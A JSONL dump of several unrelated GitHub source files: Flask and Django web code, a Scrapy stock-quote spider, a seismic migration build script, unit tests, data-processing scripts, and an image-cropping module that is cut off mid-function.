Mostra as Opções de Menu\ndef PrintMenu():\n print(\"1 - Para obter todos os items\")\n print(\"2 - Para obter um item\")\n print(\"3 - Para cadastrar um item\")\n print(\"4 - Para deletar um item\")\n print(\"6 - Para Atualizar ou cria um item (se nao existir)\")\n\n\n# Requisição GET\ndef getItems():\n print(\"[+] Para obtendo todos os items...\")\n url = 'http://127.0.0.1:5000/items'\n try:\n requisicao = requests.get(url, headers=header)\n except Exception as err:\n print('[-] Erro Na Requisição: ', err)\n\n requisicao_json = json.dumps(json.loads(requisicao.text), indent=4)\n print(\"\")\n print(requisicao_json)\n\n\n# Requisição GET\ndef getItem(nome_item):\n print(\"[+] Obtendo item...\")\n url = 'http://127.0.0.1:5000/item/'+nome_item\n try:\n requisicao = requests.get(url, headers=header)\n except Exception as err:\n print('[-] Erro Na Requisição: ', err)\n\n requisicao_json = json.dumps(json.loads(requisicao.text), indent=4)\n print(\"\")\n print(requisicao_json)\n\n\n# Requisição POST\ndef postItem(nome_item, preco_item):\n print(\"[+] Enviando item...\")\n url = 'http://127.0.0.1:5000/item/'+nome_item\n if preco_item:\n data ={\"preco\" : float(preco_item)}\n else:\n data ={\"preco\" : 00.00}\n try:\n requisicao = requests.post(url, data=json.dumps(data), headers=header)\n except Exception as err:\n print('[-] Erro Na Requisição: ', err)\n\n requisicao_json = json.dumps(json.loads(requisicao.text), indent=4)\n print(\"\")\n print(requisicao_json)\n\n\n# Requisição DEL\ndef deleteItem(self):\n print(\"\")\n print(\"[+] Deletando item...\")\n pass\n\n\n# Requisição PUT\ndef putItem(self):\n print(\"\")\n print(\"[+] Alterando/criando item...\")\n pass\n\n\nif __name__ == \"__main__\":\n try:\n Main()\n except KeyboardInterrupt:\n print('\\n[!] Error: Cliente Interrompeu o Programa!')\n sys.exit(1)\n","repo_name":"Steven-J-Alves/python-flask-api","sub_path":"Cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71476059820","text":"\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('choice/', views.choice, name='choice'),\n path('cube/', views.cube, name='cube'),\n path('rand100/', views.rand100, name='rand100'),\n path('articles/<int:author_id>', views.get_articles, name='articles'),\n path('article/<int:article_id>', views.get_article, name='article'),\n path('game/', views.game, name='game'),\n path('addauthor/', views.add_author, name='addauthor'),\n path('addarticle/', views.add_article, name='addarticle'),\n path('article_with_comment/<int:article_id>', views.comment_form, name='article_with_comment'),\n]","repo_name":"Pisarev82/Study_Django","sub_path":"seminars/seminars_project/_2_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"42189822785","text":"# -*- coding: utf-8 -*-\n#\n# Get the stock quotes\n\nimport os\nimport string\n\nimport pandas as pd\nimport scrapy\n\n\nclass QuotesSpiderI3Investor(scrapy.Spider):\n name = \"quotes_i3investor\"\n\n _URL_BASE = 'https://klse.i3investor.com/jsp/stocks.jsp?g=S&m=int&s=%s'\n _TICKER_FILE = \"KLSE_i3investor.csv\"\n\n def _chunks(self, l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n def start_requests(self):\n urls = []\n urls.append(self._URL_BASE % '0')\n for c in string.ascii_uppercase:\n urls.append(self._URL_BASE % c)\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n \"\"\"Extract the symbol and the name into a list\"\"\"\n\n if (os.path.exists(self._TICKER_FILE)):\n df_symbols = pd.read_csv(self._TICKER_FILE, dtype=str)\n df_symbols.set_index(['symbol'])\n else:\n df_symbols = pd.DataFrame()\n\n stock_listing = response.css('.left a::text').extract()\n stock_listing = list(self._chunks(stock_listing, 2))\n\n stock_urls = response.css('.left a[href]:link').extract()\n stock_urls = list(self._chunks(stock_urls, 2))\n\n for idx, stock in enumerate(stock_listing):\n stock.append(stock_urls[idx][0].split('/')[3].split('.')[0])\n\n #print('-----------------------')\n #pprint(stock_listing)\n\n df = pd.DataFrame(stock_listing, columns=[\"symbol\", \"name\", \"code\"])\n df.set_index(['symbol'])\n\n if (df_symbols.empty):\n df_symbols = df\n else:\n # print(df)\n df_symbols = df_symbols.append(df)\n\n df_symbols.to_csv(self._TICKER_FILE, encoding='utf-8', index=False)\n","repo_name":"mengwangk/ai-playground","sub_path":"source/scrapy/klse/klse/spiders/quotes_i3investor.py","file_name":"quotes_i3investor.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"97"} +{"seq_id":"5439895481","text":"from xlwt.Workbook import *\nfrom xlwt.Style import *\n\t\ndef process_file(fil):\n\tques = ''\n\tquestions = []\n\tfor n in range(0,101):\n\t\ttemp = str(n+1) + '.'\n\t\twhile temp not in ques:\n\t\t\tques = ques + fil.read(1)\n\t\tquestions.append(ques[:len(ques)-len(temp)])\n\t\tques = ''\n\t\tfil.seek(fil.tell()-len(temp))\n\treturn questions\n\t\n\ndef process_question(quest):\n\tfor cnt in range(0,len(quest)):\n\t\ttemp = quest[cnt].replace('\\n','')\n\t\ttemp = temp.replace('\\x0c','')\n\t\tquest[cnt] = temp\n\tmaster = []\n\tfor qu in quest:\n\t\ttemp = splice_line(qu)\n\t\tmaster += temp,\n\treturn master\n\ndef insert_into_excel(processed_list, ):\n\twb = Workbook()\n\tws0 = wb.add_sheet('DECAProj')\n\tws0.write(0,0,'Question')\n\tws0.write(0,1,'Answer Choice 1')\n\tws0.write(0,2,'Answer Choice 2')\n\tws0.write(0,3,'Asnwer Choice 3')\n\tws0.write(0,4,'Answer Choice 4')\n\tfor row in range(1,len(processed_list)):\n\t\tfor col in range(0,len(processed_list[row])):\n\t\t\tws0.write(row,col,str(processed_list[row][col]))\n\treturn wb\n\n\ndef splice_line(q):\n\ttemp = []\n\tdic = {}\n\tsplitList = ['A.','B.','C.','D.']\n\tfor ch in splitList:\n\t\tif ch in q:\n\t\t\tif ch == 'A.':\n\t\t\t\tdic[q.find(ch)] = 'A.'\n\t\t\telif ch =='B.':\n\t\t\t\tdic[q.find(ch)] = 'B.'\n\t\t\telif ch == 'C.':\n\t\t\t\tdic[q.find(ch)] = 'C.'\n\t\t\telif ch == 'D.':\n\t\t\t\tdic[q.find(ch)]= 'D.'\n\t\t\telse:\n\t\t\t\tpass\n\tsort_list = sorted(dic)\n\tsort_list += len(q),\n\tstart = 0\n\tfor end in sort_list:\n\t\ttemp += q[start:end].strip(),\n\t\tstart = end\n\ttemp = order_list(temp)\n\treturn temp\n\t\t\ndef order_list(lst):\n\ttemp = []\n\ttempString = lst[0]\n\ttemp += tempString[tempString.find('.')+1:],\n\tdic = {}\n\tcount = 0\n\tfor i in range(1,len(lst)):\n\t\tif lst[i][:2] == 'A.':\n\t\t\tdic[1] = i\n\t\telif lst[i][:2] == 'B.':\n\t\t\tdic[2] = i\n\t\telif lst[i][:2] == 'C.':\n\t\t\tdic[3] = i\n\t\telif lst[i][:2] == 'D.':\n\t\t\tdic[4] = i\n\t\telse:\n\t\t\tpass\t\n\tfor j in dic:\n\t\ttemp += lst[dic[j]],\n\treturn temp","repo_name":"niharpatil/DECATestToExcel","sub_path":"DECA Test Conversion/ReadTests.py","file_name":"ReadTests.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"25132686116","text":"from rsf.proj import *\n\nFetch('elf-stk2.rsf','masha')\nFlow('data','elf-stk2.rsf','dd form=native | put o1=0')\n\ndef grey(title):\n return '''\n window n1=751 |\n grey pclip=99 title=\"%s\" label2=\" \" crowd=0.85\n ''' % title\n\ndef zoom(title):\n return '''\n window min1=0.81 max1=1.60 min2=4800 max2=7600 |\n grey pclip=99 title=\"%s\" label2=\" \" crowd=0.8 grid=y\n ''' % title\n\nPlot('data',grey('(a) DMO-stack data'))\n\nFlow('fk','data','cosft sign2=1')\nFlow('stolt','fk','stolt vel=2000 pad=2049 minstr=0.5 | cosft sign2=-1')\n\nPlot('stolt',grey('(b) Stolt migration (v0 = 2000 m/s)'))\n\nFetch('vsmooth_levset.dat','masha')\n\nnx=1000\ndx=13.3333\n\nnz=1000\ndz=5.005\n\nFlow('vel','vsmooth_levset.dat',\n '''\n echo in=$SOURCE\n n1=%d o1=0 d1=%g\n n2=%d o2=0 d2=%g\n label1=Lateral unit1=m\n label2=Depth unit2=m\n label=Velocity unit=\"km/s\"\n data_format=ascii_float |\n dd form=native |\n transp \n ''' % (nx,dx,nz,dz),stdin=0)\n\nFlow('vt','vel','depth2time velocity=$SOURCE nt=800 dt=0.004 t0=0')\nFlow('bot','vt','window n1=1 f1=650 | spray axis=1 n=150')\nFlow('vt2','vt bot','window n1=650 | cat axis=1 ${SOURCES[1]}')\nFlow('vt1','vt2','stack | spray axis=2 n=1000 d=13.3333 o=0')\n\nv0 = 1800\n\nFlow('str','data vt1',\n 'stoltstretch velocity=${SOURCES[1]} vel=%g pad=1250' % v0)\nFlow('stfk','str','cosft sign2=1')\n\npar = {\n 'good': '',\n 'bad': 'stretch=0.5'\n }\n\nfor case in list(par.keys()):\n stolt = 'stolt-'+case\n Flow(stolt,'stfk vt1',\n '''\n stolt vel=%g pad=2049 minstr=0.5 %s |\n cosft sign2=-1 |\n stoltstretch velocity=${SOURCES[1]} vel=%g inv=y\n ''' % (v0,par[case],v0))\n \nPlot('stolt-bad',grey('(c) Stolt-stretch migration (W=0.5)'))\nPlot('stolt-bad-zoom','stolt-bad',\n zoom('(c) Stolt-stretch migration (W=0.5)'))\nPlot('stolt-good',grey('(a) Stolt-stretch migration (optimal W)'))\nPlot('stolt-good-zoom','stolt-good',\n zoom('(a) Stolt-stretch migration (optimal W)'))\n\nFlow('pshift','fk vt1',\n 'gazdag velocity=${SOURCES[1]} pad=2048 | cosft sign2=-1')\nPlot('pshift',grey('(b) Phase-shift migration'))\nPlot('pshift-zoom','pshift',\n zoom('(b) Phase-shift migration'))\n\nntcut = [0,125,275,350,400,800]\nvref = [1949,1678,1751,1377,627.9]\nncut = len(ntcut)-1\n\nFlow('casc','vt1','cascade ncut=%d ntcut=%s' % \n (ncut-1,','.join(map(str,ntcut[1:ncut]))))\n\nFlow('casc2','vt1','cascade ncut=2 ntcut=200,400')\n\nPlot('vt1',\n '''\n window n2=1 n1=751 | graph crowd=0.8\n transp=y yreverse=y xinch=7 titlesz=14 labelsz=10 \n title=\"(a)\" label1=Time unit1=s label2=Velocity unit2=m/s\n wheretitle=b wherexlabel=t\n ''')\n\nfor case in ('casc','casc2'):\n Plot(case,['vt1',case],\n '''\n transp plane=23 |\n cat axis=2 ${SOURCES[1]} |\n window n3=1 n1=751 | graph crowd=0.8\n transp=y yreverse=y titlesz=14 labelsz=10 \n title=\"(%c)\" label1=Time unit1=s label2=Velocity unit2=m/s\n wheretitle=b wherexlabel=t dash=0,1,2,3,4,5\n ''' % 'bc'[case=='casc'])\n\nResult('velocities','vt1 casc2 casc','SideBySideAniso')\n\ndata = 'data'\nwins = []\nmigs = []\n\nfor ic in range(ncut):\n # migrate\n migr = 'migr%d' % ic\n vel = 'vel%d' % ic\n v0 = vref[ic]\n \n Flow(vel,'casc','window n2=1 f2=%d' % ic)\n Flow(migr,[data,vel],\n '''\n stoltstretch velocity=${SOURCES[1]} vel=%g pad=1250 |\n cosft sign2=1 |\n stolt vel=%g pad=2049 minstr=0.5 |\n cosft sign2=-1 |\n stoltstretch velocity=${SOURCES[1]} vel=%g inv=y\n ''' % (v0,v0,v0))\n migs.append(migr)\n data = migr\n\n # window\n wind = 'wind%d' % ic\n wins.append(wind)\n Flow(wind,'data',\n 'math output=%d | window f1=%d n1=%d' % \n (ic,ntcut[ic],ntcut[ic+1]-ntcut[ic]))\n\nFlow('slice',wins,\n '''\n cat axis=1 ${SOURCES[1:%d]} | \n math output=input-0.01 | \n smooth rect1=50\n ''' % ncut)\nFlow('cmig',migs+['slice'],\n '''\n cat ${SOURCES[1:%d]} |\n put o3=0 d3=1 |\n transp plane=23 |\n slice pick=${SOURCES[%d]} |\n window\n ''' % (ncut,ncut))\n\nPlot('cmig',grey('(c) Cascaded Stolt-Stretch (%d velocities)' % ncut))\nPlot('cmig-zoom','cmig',\n zoom('(d) Cascaded Stolt-Stretch (%d velocities)' % ncut))\n\nResult('data-stolt-ststr','data stolt stolt-bad','OverUnderAniso',\n vppen='xscale=1.7')\n\nResult('data-ststr-pshift-casc','stolt-good pshift cmig','OverUnderAniso',\n vppen='xscale=1.7')\n\nResult('dip-zoom','stolt-good-zoom pshift-zoom stolt-bad-zoom cmig-zoom',\n 'TwoRows')\n\nEnd()\n","repo_name":"ahay/src","sub_path":"book/sep/stoltst/elfst/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"97"} +{"seq_id":"2714252937","text":"#!/usr/bin/env python3\n\nimport unittest\nimport options\n\nimport framenetreader\nfrom framenetparsedreader import FNParsedReader\n \nclass FNParsedReaderTest(unittest.TestCase):\n def comp(self, original, parsed):\n return all(\n [x == y or y == \"<num>\" for x,y in zip(original.split(), parsed.split())]\n )\n\n def test_sentences_match(self, num_sample = 0):\n\n # List of sentences and files for which the test would fail because of\n # mistakes in the parser output\n\n bad_files = [\"ANC__110CYL\", \"ANC__HistoryOfJerusalem\",\n \"ANC__HistoryOfLasVegas\", \"ANC__WhereToHongKong\",\n \"C-4__C-4Text.xml\", \"KBEval\", \"LUCorpus-v0.3\", \"NTI\",\n \"PropBank__BellRinging\", \"PropBank__LomaPrieta\",\n \"IranRelatedQuestions\"]\n\n bad_sentences = [(\"Miscellaneous__SadatAssassination.xml\", 0),\n (\"PropBank__AetnaLifeAndCasualty.xml\", 0),\n (\"PropBank__ElectionVictory.xml\", 0),\n (\"PropBank__TicketSplitting.xml\", 0),\n (\"SemAnno__Text1.xml\", 3)]\n\n\n parsed_reader = FNParsedReader()\n\n for annotation, parse in zip(options.fulltext_annotations, options.fulltext_parses):\n # Skip unwanted files\n if any([annotation.match('*{}*'.format(bad_file)) for bad_file in bad_files]):\n continue\n\n reader = framenetreader.FulltextReader(annotation, False)\n previous_sentence = 0\n\n for frame in reader.frames:\n # don't test bad sentences in files\n if any(annotation.match(bad_annotation) and bad_sentence_id == frame.sentence_id\n for bad_annotation, bad_sentence_id in bad_sentences):\n continue\n\n # find the correct sentence\n if frame.sentence_id != previous_sentence:\n for sentence_id, builder_sentence, tree in parsed_reader.sentence_trees(parse):\n if sentence_id == frame.sentence_id:\n sentence = tree.flat()\n self.assertEqual(builder_sentence, sentence)\n previous_sentence = frame.sentence_id\n\n # test the sentence\n self.assertTrue(self.comp(frame.sentence, sentence))\n","repo_name":"aymara/knowledgesrl","sub_path":"tests/test_framenetparsedreader.py","file_name":"test_framenetparsedreader.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"97"} +{"seq_id":"16528454728","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 1 13:36:09 2022\n\n@author: masullo\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nplt.close('all')\n\npath = 'fi2_pick_clusters/'\n\nfname_cluster = {}\n\nfname_cluster['R1'] = 'R1_7nt_150pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\nfname_cluster['R2'] = 'R2_7nt_100pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\nfname_cluster['R3'] = 'R3_7nt_100pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\nfname_cluster['R4'] = 'R4_7nt_100pM_18mW_150ms_561_1_MMStack_Pos0.ome_locs_render_render_filter_aligned_apicked_ClusterD11_10_22.0_apicked.hdf5'\n\npx_size = 130 # nm\n\nlocs_c_x = {}\nlocs_c_y = {}\nlocs_c_z = {}\n\ndisplay_xlocs_c = {}\ndisplay_ylocs_c = {}\ndisplay_zlocs_c = {}\n\nfor i, ch in enumerate(['R1', 'R2', 'R3', 'R4']):\n \n my_df_cluster = pd.read_hdf(path + fname_cluster[ch], key='locs') \n \n my_df_cluster.x = my_df_cluster.x * px_size\n my_df_cluster.y = my_df_cluster.y * px_size\n \n locs_c_x[ch] = my_df_cluster.x\n locs_c_y[ch] = my_df_cluster.y\n locs_c_z[ch] = my_df_cluster.z\n\nplt.style.use('dark_background')\n# fig, ax = plt.subplots()\n# ax.set_aspect('equal')\n \ncolors = ['#CC99C9', '#9EC1CF', '#9EE09E', '#FEB144'] # purple, blue, green, orange\ndisplay3d = False\n\n# if display3d:\n \n# #TODO: fix 3D visualization\n \n# for i, ch in enumerate(['R1', 'R2', 'R3', 'R4']):\n \n# ax = fig.add_subplot(projection='3d')\n \n# xmin, xmax = 30000, 34000\n# ymin, ymax = 33000, 37000\n# roi = (locs_nc_y[ch] > ymin) & (locs_nc_y[ch] < ymax) & (locs_nc_x[ch] > xmin) & (locs_nc_x[ch] < xmax)\n \n# display_xlocs_nc[ch] = locs_nc_x[ch][roi]\n# # display_xlocs_c[ch] = locs_c_x[ch][roi]\n\n# display_ylocs_nc[ch] = locs_nc_y[ch][roi]\n# # display_ylocs_c[ch] = locs_c_y[ch][roi]\n \n# display_zlocs_nc[ch] = locs_nc_z[ch][roi]\n# # display_zlocs_c[ch] = locs_c_z[ch][roi]\n\n \n# ax.scatter(display_xlocs_nc[ch], display_ylocs_nc[ch], display_zlocs_nc[ch], color=colors[i], edgecolors='white', alpha=0.3)\n# # ax.scatter(display_xlocs_c[ch], display_ylocs_c[ch], display_zlocs_c[ch], color=colors[i], edgecolors='white')\n# # ax.set_xlim(32000, 33000)\n# # ax.set_ylim(35000, 36000)\n \n# else:\n\nfor i, ch in enumerate(['R1', 'R2', 'R3', 'R4']):\n \n plt.style.use('dark_background')\n fig, ax = plt.subplots()\n ax.set_aspect('equal')\n \n zmin = locs_c_z[ch].min()\n \n locs_c_z[ch] = locs_c_z[ch] - zmin\n \n zmax = locs_c_z[ch].max()\n \n print(zmin, zmax)\n \n for j, (x, y, z) in enumerate(zip(locs_c_x[ch], locs_c_y[ch], locs_c_z[ch])):\n \n \n ax.scatter(x, y, color=colors[i], edgecolors='white', alpha=z/zmax)\n \n # ax.scatter(locs_c_x[ch], locs_c_y[ch], color=colors[i], edgecolors='white')\n ax.set_xlim(32684, 32842)\n ax.set_ylim(38487, 38659)","repo_name":"jungmannlab/resi","sub_path":"Plotting_Figures/Figure 2/npc_labelling_clustered_only.py","file_name":"npc_labelling_clustered_only.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"97"} +{"seq_id":"12065128797","text":"from flask import Flask, jsonify, request, abort, render_template, redirect, url_for\nfrom auth.auth import requires_auth, AuthError\nfrom models import setup_db, Actor, Movie\nfrom flask_cors import CORS\nimport os\nfrom jose import jwt\n\n\nAUTH0_DOMAIN = os.getenv('AUTH0_DOMAIN')\nAPI_AUDIENCE = os.getenv('API_AUDIENCE')\nAUTH_CLIENT_ID = os.getenv('AUTH_CLIENT_ID')\n\n\nRESULTS_PER_PAGE = 10\n\n# App configuration\n\n\ndef create_app(test_config=None):\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PUT,POST,DELETE,OPTIONS')\n return response\n\n # routes\n @app.route('/')\n def index():\n login_uri = 'https://{}/authorize?audience={}&response_type=token&client_id={}&redirect_uri={}'.format(\n AUTH0_DOMAIN, API_AUDIENCE, AUTH_CLIENT_ID, 'http://localhost:5000/')\n \n return render_template('index.html', login_url = login_uri)\n\n\n # Pagination of restuls\n\n def paginate_results(request, data):\n page = request.args.get('page', 1, type=int)\n start = (page - 1) * RESULTS_PER_PAGE\n end = start + RESULTS_PER_PAGE\n\n actors = [actor.format() for actor in data]\n paginated_results = actors[start:end]\n\n return paginated_results\n\n # routes\n # TODO: get_actors : DONE\n\n @app.route('/actors', methods=['GET'])\n @requires_auth('get:actors')\n def get_actors(jwt):\n try:\n actors = Actor.query.order_by(Actor.id).all()\n paginated_actors = paginate_results(request, actors)\n if actors:\n return jsonify({\n 'success': True,\n 'actors': paginated_actors,\n 'total_actors': len(actors)\n })\n else:\n return jsonify({\n 'success': True,\n 'message': 'no actor found'\n })\n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: post_actors : Done\n @app.route('/actors', methods=['POST'])\n @requires_auth('post:actors')\n def create_actor(jwt):\n body = request.get_json()\n name = body.get('name', None)\n age = body.get('age', None)\n gender = body.get('gender', None)\n movie_id = body.get('movie_id', None)\n \n try:\n if body is not None:\n actor = Actor(\n name=name,\n gender=gender,\n age=age,\n movie_id=movie_id)\n actor.insert()\n\n return jsonify({\n 'success': True,\n 'created': actor.id\n })\n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: delete_actors : Done\n @app.route('/actors/<int:actor_id>', methods=['DELETE'])\n @requires_auth('delete:actors')\n def delete_actor(jwt, actor_id):\n actor = Actor.query.filter(Actor.id == actor_id).one_or_none()\n print(actor)\n \n try: \n actor.delete()\n return jsonify({\n 'success': True,\n 'deleted': actor_id\n })\n \n except Exception as e:\n print(e)\n if actor is None:\n abort(404)\n abort(422)\n\n # TODO: patch_actors : Done\n @app.route('/actors/<int:actor_id>', methods=['PATCH'])\n @requires_auth('patch:actors')\n def update_actor(jwt, actor_id):\n body = request.get_json()\n name = body.get('name', None)\n age = body.get('age', None)\n gender = body.get('gender', None)\n movie_id = body.get('movie_id', None)\n\n try:\n actor = Actor.query.filter(Actor.id == actor_id).one_or_none()\n actor.name = name\n actor.age = age\n actor.gender = gender\n actor.movie_id = movie_id\n actor.update()\n\n return jsonify({\n 'success': True,\n 'updated': actor.id\n })\n\n except Exception as e:\n print(e)\n if actor is None:\n abort(404)\n abort(422)\n\n # routes\n # TODO: get_movies : DONE\n @app.route('/movies', methods=['GET'])\n @requires_auth('get:movies')\n def get_movies(jwt):\n try:\n movies = Movie.query.order_by(Movie.id).all()\n paginated_movies = paginate_results(request, movies)\n \n if movies:\n return jsonify({\n 'success': True,\n 'movies': paginated_movies,\n 'total_movies': len(movies)\n })\n else:\n return jsonify({\n 'success': True,\n 'message': 'no movies found',\n 'total_movies': len(movies)\n })\n \n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: post_movies : DONE\n\n @app.route('/movies', methods=['POST'])\n @requires_auth('post:movies')\n def create_movie(jwt):\n body = request.get_json()\n title = body.get('title', None)\n release = body.get('release_date', None)\n try:\n if body is not None:\n movie = Movie(title=title, release_date=release)\n movie.insert()\n return jsonify({\n 'success': True,\n 'created': movie.id\n })\n\n except Exception as e:\n print(e)\n abort(422)\n\n # TODO: delete_movies : DONE\n\n @app.route('/movies/<int:movie_id>', methods=['DELETE'])\n @requires_auth('delete:movies')\n def delete_movie(jwt, movie_id):\n movie = Movie.query.filter(Movie.id == movie_id).one_or_none()\n print(movie)\n try:\n movie.delete()\n return jsonify({\n 'success': True,\n 'deleted': movie_id\n })\n\n except Exception as e:\n print(e)\n if movie is None:\n abort(404)\n abort(422)\n\n # TODO: patch_movies : Done\n @app.route('/movies/<int:movie_id>', methods=['PATCH'])\n @requires_auth('patch:movies')\n def update_movie(jwt, movie_id):\n\n body = request.get_json()\n title = body.get('title', None)\n release = body.get('release_date', None)\n\n try:\n if body is not None:\n movie = Movie.query.filter(Movie.id == movie_id).one_or_none()\n movie.title = title\n movie.release_date = release\n\n movie.update()\n\n return jsonify({\n 'success': True,\n 'updated': movie.id\n })\n\n except Exception as e:\n print(e)\n if movie is None:\n abort(404)\n abort(422)\n\n # Error handlers\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'not found'\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': 'unprocessable'\n }), 422\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': 'bad request'\n }), 400\n\n @app.errorhandler(401)\n def bad_request(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': 'unauthorized'\n }), 401\n\n @app.errorhandler(AuthError)\n def notAuthenticatedUser(auth_error):\n return jsonify({\n \"success\": False,\n \"error\": auth_error.status_code,\n \"message\": auth_error.error\n }), auth_error.status_code\n\n return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"arhamrashid/FSND-capstone-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"19409568552","text":"import pytest\nfrom mock import patch, MagicMock\nfrom splitgill.indexing.utils import DOC_TYPE\n\nfrom ckanext.versioned_datastore.lib.basic_query.utils import format_facets, get_fields\n\n\nclass TestBasicQueryUtils(object):\n def test_format_facets(self):\n # first, check it can deal with an empty aggregation result\n assert format_facets({}) == {}\n\n facets = format_facets(\n {\n 'facet1': {\n 'sum_other_doc_count': 901,\n 'doc_count_error_upper_bound': 12,\n 'buckets': [\n {'key': 'value1', 'doc_count': 43},\n {'key': 'value2', 'doc_count': 243},\n {'key': 'value3', 'doc_count': 543},\n {'key': 'value4', 'doc_count': 143},\n {'key': 'value5', 'doc_count': 743},\n ],\n },\n 'facet2': {\n 'sum_other_doc_count': 0,\n 'doc_count_error_upper_bound': 0,\n 'buckets': [\n {'key': 'value1', 'doc_count': 6},\n ],\n },\n }\n )\n\n assert len(facets) == 2\n assert facets['facet1']['details']['sum_other_doc_count'] == 901\n assert facets['facet1']['details']['doc_count_error_upper_bound'] == 12\n assert len(facets['facet1']['values']) == 5\n assert facets['facet1']['values']['value1'] == 43\n assert facets['facet1']['values']['value2'] == 243\n assert facets['facet1']['values']['value3'] == 543\n assert facets['facet1']['values']['value4'] == 143\n assert facets['facet1']['values']['value5'] == 743\n\n assert facets['facet2']['details']['sum_other_doc_count'] == 0\n assert facets['facet2']['details']['doc_count_error_upper_bound'] == 0\n assert len(facets['facet2']['values']) == 1\n assert facets['facet2']['values']['value1'] == 6\n\n @pytest.mark.filterwarnings('ignore::sqlalchemy.exc.SADeprecationWarning')\n @pytest.mark.ckan_config('ckan.plugins', 'versioned_datastore')\n @pytest.mark.usefixtures('with_versioned_datastore_tables', 'with_plugins')\n def test_get_fields(self):\n mock_mapping = {\n u\"beans-index\": {\n u\"mappings\": {\n DOC_TYPE: {\n u\"properties\": {\n u\"data\": {\n u\"properties\": {\n u\"_id\": {'type': 'long'},\n u\"field1\": {\n u\"type\": u\"keyword\",\n },\n u\"field2\": {\n u\"type\": u\"date\",\n },\n }\n }\n }\n }\n }\n }\n }\n\n mapping_mock_function = MagicMock(return_value=mock_mapping)\n prefix_mock = lambda name: f'beans-{name}'\n client_mock = MagicMock(indices=MagicMock(get_mapping=mapping_mock_function))\n search_helper_mock = MagicMock()\n es_response = [\n MagicMock(hits=MagicMock(total=4)),\n MagicMock(hits=MagicMock(total=10)),\n ]\n multisearch_mock = MagicMock()\n multisearch_mock.configure_mock(\n add=MagicMock(return_value=multisearch_mock),\n execute=MagicMock(return_value=es_response),\n )\n multisearch_class_mock = MagicMock(return_value=multisearch_mock)\n\n with patch(\n 'ckanext.versioned_datastore.lib.basic_query.utils.prefix_resource',\n new=prefix_mock,\n ), patch(\n 'ckanext.versioned_datastore.lib.common.ES_CLIENT', new=client_mock\n ), patch(\n 'ckanext.versioned_datastore.lib.common.SEARCH_HELPER',\n new=search_helper_mock,\n ), patch(\n 'ckanext.versioned_datastore.lib.basic_query.utils.MultiSearch',\n new=multisearch_class_mock,\n ):\n mapping, fields = get_fields('index')\n assert mapping == mock_mapping['beans-index']\n assert len(fields) == 3\n # the first field should always be the _id field and it should always be an integer type\n assert fields[0] == {'id': '_id', 'type': 'integer'}\n assert {'id': 'field1', 'type': 'string'} in fields\n assert {'id': 'field2', 'type': 'string'} in fields\n","repo_name":"NaturalHistoryMuseum/ckanext-versioned-datastore","sub_path":"tests/unit/lib/basic_query/test_basic_query_utils.py","file_name":"test_basic_query_utils.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"97"} +{"seq_id":"5621569966","text":"'''\nmodule opens images on disc and cut them to desired size\nnew photos store on disc with a new name: add char 'p' before orig photo name\n'''\nimport os\nimport timeit\nfrom multiprocessing import Pool\nfrom itertools import repeat\nimport numpy\nimport cv2\n\nfrom . import collage_create\n\n\ndef get_roi(x_c: int, y_c: int, i_w: int, i_h: int, iw_h: int):\n \"\"\"\n find ROI of image\n :param x_c: center X coord of ROI, pixels (int)\n :param y_c: center Y coord of ROI, pixels (int)\n :param i_w: input img width\n :param i_h: input img height\n :param iw_h: half of output img with and height\n :return: tuple(outxc, outyc)\n \"\"\"\n outx_c = x_c\n outy_c = y_c\n\n if x_c + iw_h > i_w:\n outx_c -= iw_h - (i_w - x_c)\n elif x_c - iw_h < 0:\n outx_c += iw_h - (x_c)\n\n if y_c + iw_h > i_h:\n outy_c -= iw_h - 